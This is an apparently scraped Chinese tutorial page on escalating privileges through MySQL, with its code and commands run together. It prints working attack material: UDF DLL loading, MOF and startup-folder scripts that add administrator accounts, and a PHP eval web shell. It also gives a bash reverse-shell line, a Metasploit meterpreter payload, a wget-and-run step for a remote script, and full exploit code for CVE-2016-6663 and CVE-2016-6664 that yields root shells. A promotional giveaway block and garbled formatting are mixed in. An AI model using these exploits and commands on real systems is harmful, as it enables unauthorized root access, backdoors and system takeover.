时间:2023-06-30 16:24:02 | 来源:网站运营
时间:2023-06-30 16:24:02 来源:网站运营
文件,对应的设置为bind-address =
改成0.0.0.0即可,即bind-address =
用户远程连接到数据库grant all on *.* to admin@'%' identified by '123456' with grant option;flush privileges;
这个值是默认为NULL的,即不能够往数据库内写入文件。为了感谢广大读者伙伴的支持,准备了以下福利给到大家: 【一>所有资源获取<一】 1、200多本网络安全系列电子书(该有的都有了) 2、全套工具包(最全中文版,想用哪个用哪个) 3、100份src源码技术文档(项目学习不停,实践得真知) 4、网络安全基础入门、Linux、web安全、攻防方面的视频(2021最新版) 5、网络安全学习路线(告别不入流的学习) 6、ctf夺旗赛解析(题目解析实战操作)
mysql -u root -p
解密即可。python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
python2 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
show variables like "%plugin%";
这里可以看到我的插件目录就是C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin
select @@basedir
,但是这里报错ERROR 1126
,这里我百度过后发现这个dll并不是跟系统位数有关的,而是跟mysql版本有关系,而且phpstudy自带的mysql版本需要用32位的dll才能够操作CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
函数select * from mysql.func;
文件设置bind-address =
文件夹下,这里可以看到dump dll成功bind-address =
目录有读写权限3.可以找到一个可写目录,写入mof文件### 手动提权testmod.mod
文件并上传到靶机的可写目录#pragma namespace("////.//root//subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root//Cimv2"; Name= "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa /"Win32_LocalTime/" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(/"WScript.Shell/")/nWSH.run(/"net.exe user test test123 /add/")/nWSH.run(/"net.exe localgroup administrators test /add/")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
进入mysql命令行执行导入命令,导入完成过后系统会自动运行select load_file("nullevt.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"
使用net user
命令即可发现已经加入了管理员组use exploit/windows/mysql/mysql_mofset payload windows/meterpreter/reverse_tcpset rhosts username rootset password rootrun
# 停止 winmgmt 服务net stop winmgmt# 删除 Repository 文件夹rmdir /s /q C:/Windows/system32/wbem/Repository/# 手动删除 mof 文件del C:/Windows/system32/wbem/mof/good/test.mof /F /S# 删除创建的用户net user hacker /delete# 重新启动服务net start winmgmt
C:/Documents and Settings/Administrator/「开始」菜单/程序/启动C:/Documents and Settings/All Users/「开始」菜单/程序/启动
在windows2008的系统下,启动项路径如下:C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/StartupC:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup
添加用户密码,上传到启动目录重启的时候即可自动添加账号密码set wshshell=createobject("wscript.shell")a=wshshell.run("cmd.exe /c net user test test123 /add",0)b=wshshell.run("cmd.exe /c net localgroup administrators test /add",0)
use mysql;create table test(cmd text);insert into a values(“set wshshell=createobject(“”wscript.shell””)”);insert into a values(“a=wshshell.run(“”cmd.exe /c net user test test123 /add“”,0)”);insert into a values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators test /add“”,0)”);select * from a into outfile “C:/Documents and Settings/All Users/「开始」菜单/程序/启动/secist.vbs”;
1.目标主机配置必须是是基于文件的日志(默认配置),也就是不能是syslog方式(通过cat /etc/mysql/conf.d/mysqld_safe_syslog.cnf查看没有包含“syslog”字样即可)
docker pull tutum/lampdocker run -d -P tutum/lampdocker psdocker exec -it b9 /bin/bash
apt updateapt install -y wget gcc libmysqlclient-dev
' '
进行转义,否则会报错cd /var/htmlecho '<?php @eval($_POST['hacker']); ?>' > shell.php
chmod -R 777 /var/www/html
进入mysql环境添加一个对test库有create,drop,insert,select权限的test用户,密码为123456service restart apache2service restart mysqlocker commit c0ae81326db0 test/lampdocker run -d -p 8080:80 -p 3306:3306 test/lamp
,exp如下所示#include <fcntl.h>#include <grp.h>#include <mysql.h>#include <pwd.h>#include <stdint.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/inotify.h>#include <sys/stat.h>#include <sys/types.h>#include <sys/wait.h>#include <time.h>#include <unistd.h>#define EXP_PATH"/tmp/mysql_privesc_exploit"#define EXP_DIRN"mysql_privesc_exploit"#define MYSQL_TAB_FILEEXP_PATH "/exploit_table.MYD"#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD"#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD"#define MAX_DELAY 1000// can be used in the race to adjust the timing if necessaryMYSQL *conn; // DB handlesMYSQL_RES *res;MYSQL_ROW row;unsigned long cnt;void intro() {printf( "/033[94m/n""MySQL/Percona/MariaDB - Privilege Escalation / Race Condition PoC Exploit/n""mysql-privesc-race.c (ver. 1.0)/n/n""CVE-2016-6663 / CVE-2016-5616/n/n""For testing purposes only. Do no harm./n/n""Discovered/Coded by:/n/n""Dawid Golunski /n""http://legalhackers.com""/033[0m/n/n");}void usage(char *argv0) {intro();printf("Usage:/n/n%s user pass db_host database/n/n", argv0);}void mysql_cmd(char *sql_cmd, int silent) {if (!silent) {printf("%s /n", sql_cmd);}if (mysql_query(conn, sql_cmd)) {fprintf(stderr, "%s/n", mysql_error(conn));exit(1);}res = mysql_store_result(conn);if (res>0) mysql_free_result(res);}int main(int argc,char **argv){int randomnum = 0;int io_notified = 0;int myd_handle;int wpid;int is_shell_suid=0;pid_t pid;int status;struct stat st;/* io notify */int fd;int ret;char buf[4096] __attribute__((aligned(8)));int num_read;struct inotify_event *event;/* credentials */char *user = argv[1];char *password = argv[2];char *db_host= argv[3];char *database = argv[4];// Disable buffering of stdoutsetvbuf(stdout, NULL, _IONBF, 0);// Get the paramsif (argc!=5) {usage(argv[0]);exit(1);} intro();// Show initial privilegesprintf("/n[+] Starting the exploit as: /n");system("id");// Connect to the database server with provided credentialsprintf("/n[+] Connecting to the database `%s` as %s@%s/n", database, user, db_host);conn = mysql_init(NULL);if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {fprintf(stderr, "%s/n", mysql_error(conn));exit(1);}// Prepare tmp dirprintf("/n[+] Creating exploit temp directory %s/n", "/tmp/" EXP_DIRN);umask(000);system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);system("chmod g+s /tmp/" EXP_DIRN );// Prepare exploit tables :)printf("/n[+] Creating mysql tables /n/n");mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file// The file should be owned by mysql:attacker thanks to the sticky bit on the table directoryprintf("/n[+] Copying bash into the mysql_suid_shell table./nAfter the exploitation the following file/table will be assigned SUID and executable bits : /n");system("cp /bin/bash " SUID_SHELL);system("ls -l " SUID_SHELL);// Use inotify to get the timing rightfd = inotify_init();if (fd < 0) {printf("failed to inotify_init/n");return -1;}ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */printf("/n[+] Entering the race loop... Hang in there.../n");while ( is_shell_suid != 1 ) {cnt++;if ( (cnt % 100) == 0 ) {printf("->");//fflush(stdout); }/* Create empty file , remove if already exists */unlink(MYSQL_TEMP_FILE);unlink(MYSQL_TAB_FILE);mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);/* random num if needed */srand ( time(NULL) );randomnum = ( rand() % MAX_DELAY );// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlinkpid = fork();if (pid < 0) {fprintf(stderr, "Fork failed :(/n");}/* Child process - executes REPAIR TABLESQL statement */if (pid == 0) {usleep(500);unlink(MYSQL_TEMP_FILE);mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);// child stops hereexit(0);}/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */if (pid > 0 ) {io_notified = 0;while (1) {int processed = 0;ret = read(fd, buf, sizeof(buf));if (ret < 0) {break;}while (processed < ret) {event = (struct inotify_event *)(buf + processed);if (event->mask & IN_CLOSE) {if (!strcmp(event->name, "exploit_table.TMD")) {//usleep(randomnum);// Set the .MYD permissions to suid+exec before they get copied to the .TMD file unlink(MYSQL_TAB_FILE);myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);close(myd_handle);chmod(MYSQL_TAB_FILE, 04777);// Replace the temp .TMD file with a symlink to the target sh binary to get suid+execunlink(MYSQL_TEMP_FILE);symlink(SUID_SHELL, MYSQL_TEMP_FILE);io_notified=1;}}processed += sizeof(struct inotify_event);}if (io_notified) {break;}}waitpid(pid, &status, 0);}// Check if SUID bit was set at the end of this attemptif ( lstat(SUID_SHELL, &st) == 0 ) {if (st.st_mode & S_ISUID) {is_shell_suid = 1;}} }printf("/n/n[+] /033[94mBingo! Race won (took %lu tries) !/033[0m Check out the /033[94mmysql SUID shell/033[0m: /n/n", cnt);system("ls -l " SUID_SHELL);printf("/n[+] Spawning the /033[94mmysql SUID shell/033[0m now... /nRemember that from there you can gain /033[1;31mroot/033[0m with vuln /033[1;31mCVE-2016-6662/033[0m or /033[1;31mCVE-2016-6664/033[0m :)/n/n");system(SUID_SHELL " -p -i ");//system(SUID_SHELL " -p -c '/bin/bash -i -p'");/* close MySQL connection and exit */printf("/n[+] Job done. Exiting/n/n");mysql_close(conn);return 0;}
nc -lvvp 7777/bin/bash -i >& /dev/tcp/ 0>&1cd var/www/html/gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient./mysql-privesc-race test 123456 localhost test
vi /etc/mysql/conf.d/mysqld_safe_syslog.cnf
删除掉syslog,然后重启mysql#<img src="https://legalhackers.com## Follow https://twitter.com/dawid_golunski for updates on this advisory.## This PoC exploit allows attackers to (instantly) escalate their privileges# from mysql system account to root through unsafe error log handling.# The exploit requires that file-based logging has been configured (default).# To confirm that syslog logging has not been enabled instead use:# grep -r syslog /etc/mysql# which should return no results.## This exploit can be chained with the following vulnerability:# CVE-2016-6663 / OCVE-2016-5616# which allows attackers to gain access to mysql system account (mysql shell).## In case database server has been configured with syslog you may also use:# CVE-2016-6662 as an alternative to this exploit.## Usage:# ./mysql-chowned.sh path_to_error.log ### See the full advisory for details at:# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html## Video PoC:# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html## Disclaimer:# For testing purposes only. Do no harm.#BACKDOORSH="/bin/bash"BACKDOORPATH="/tmp/mysqlrootsh"PRIVESCLIB="/tmp/privesclib.so"PRIVESCSRC="/tmp/privesclib.c"SUIDBIN="/usr/bin/sudo"function cleanexit {# Cleanup echo -e "/n[+] Cleaning up..."rm -f $PRIVESCSRCrm -f $PRIVESCLIBrm -f $ERRORLOGtouch $ERRORLOGif [ -f /etc/ld.so.preload ]; thenecho -n > /etc/ld.so.preloadfiecho -e "/n[+] Job done. Exiting with code $1 /n"exit $1}function ctrl_c() {echo -e "/n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."cleanexit 0}#intro echo -e "/033[94m /nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit /nmysql-chowned.sh (ver. 1.0)/n/nCVE-2016-6664 / OCVE-2016-5617/n"echo -e "Discovered and coded by: /n/nDawid Golunski /nhttp://legalhackers.com /033[0m"# Argsif [ $# -lt 1 ]; thenecho -e "/n[!] Exploit usage: /n/n$0 path_to_error.log /n"echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`/n"exit 3fi# Priv checkecho -e "/n[+] Starting the exploit as /n/033[94m`id`/033[0m"id | grep -q mysql if [ $? -ne 0 ]; thenecho -e "/n[!] You need to execute the exploit as mysql user! Exiting./n"exit 3fi# Set target pathsERRORLOG="$1"if [ ! -f $ERRORLOG ]; thenecho -e "/n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again./n"exit 3fiecho -e "/n[+] Target MySQL log file set to $ERRORLOG"# [ Active exploitation ]trap ctrl_c INT# Compile privesc preload libraryecho -e "/n[+] Compiling the privesc shared library ($PRIVESCSRC)"cat <<_solibeof_>$PRIVESCSRC#define _GNU_SOURCE#include <stdio.h>#include <sys/stat.h>#include <unistd.h>#include <dlfcn.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>uid_t geteuid(void) {static uid_t(*old_geteuid)();old_geteuid = dlsym(RTLD_NEXT, "geteuid");if ( old_geteuid() == 0 ) {chown("$BACKDOORPATH", 0, 0);chmod("$BACKDOORPATH", 04777);//unlink("/etc/ld.so.preload");}return old_geteuid();}_solibeof_/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"if [ $? -ne 0 ]; thenecho -e "/n[!] Failed to compile the privesc lib $PRIVESCSRC."cleanexit 2;fi# Prepare backdoor shellcp $BACKDOORSH $BACKDOORPATHecho -e "/n[+] Backdoor/low-priv shell installed at: /n`ls -l $BACKDOORPATH`"# Safety checkif [ -f /etc/ld.so.preload ]; thenecho -e "/n[!] /etc/ld.so.preload already exists. Exiting for safety."exit 2fi# Symlink the log file to /etcrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOGif [ $? -ne 0 ]; thenecho -e "/n[!] Couldn't remove the $ERRORLOG file or create a symlink."cleanexit 3fiecho -e "/n[+] Symlink created at: /n`ls -l $ERRORLOG`"# Wait for MySQL to re-open the logsecho -ne "/n[+] Waiting for MySQL to re-open the logs/MySQL service restart.../n"read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWERif [ "$THE_ANSWER" = "y" ]; thenecho -e "Got it. Executing 'killall mysqld' now..."killall mysqldfiwhile :; do sleep 0.1if [ -f /etc/ld.so.preload ]; thenecho $PRIVESCLIB > /etc/ld.so.preloadrm -f $ERRORLOGbreak;fidone# /etc/dir should be owned by mysql user at this point# Inject the privesc.so shared library to escalate privilegesecho $PRIVESCLIB > /etc/ld.so.preloadecho -e "/n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: /n`ls -l /etc/ld.so.preload`"echo -e "/n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"echo -e "/n[+] The /etc/ld.so.preload file now contains: /n`cat /etc/ld.so.preload`"chmod 755 /etc/ld.so.preload# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)echo -e "/n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"sudo 2>/dev/null >/dev/null#while :; do #sleep 0.1#ps aux | grep mysqld | grep -q 'log-error'#if [ $? -eq 0 ]; then#break;#fi#done# Check for the rootshellls -l $BACKDOORPATHls -l $BACKDOORPATH | grep rws | grep -q rootif [ $? -eq 0 ]; then echo -e "/n[+] Rootshell got assigned root SUID perms at: /n`ls -l $BACKDOORPATH`"echo -e "/n/033[94mGot root! The database server has been ch-OWNED !/033[0m"elseecho -e "/n[!] Failed to get root"cleanexit 2fi# Execute the rootshellecho -e "/n[+] Spawning the rootshell $BACKDOORPATH now! /n"$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"$BACKDOORPATH -p# Job done.cleanexit 0" style="margin: auto" />
在刚才mysql权限的shell中下载提权脚本并执行,即可得到root权限wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.shchmod 777 mysql-chowned.sh./mysql-chowned.sh /var/log/mysql/error.log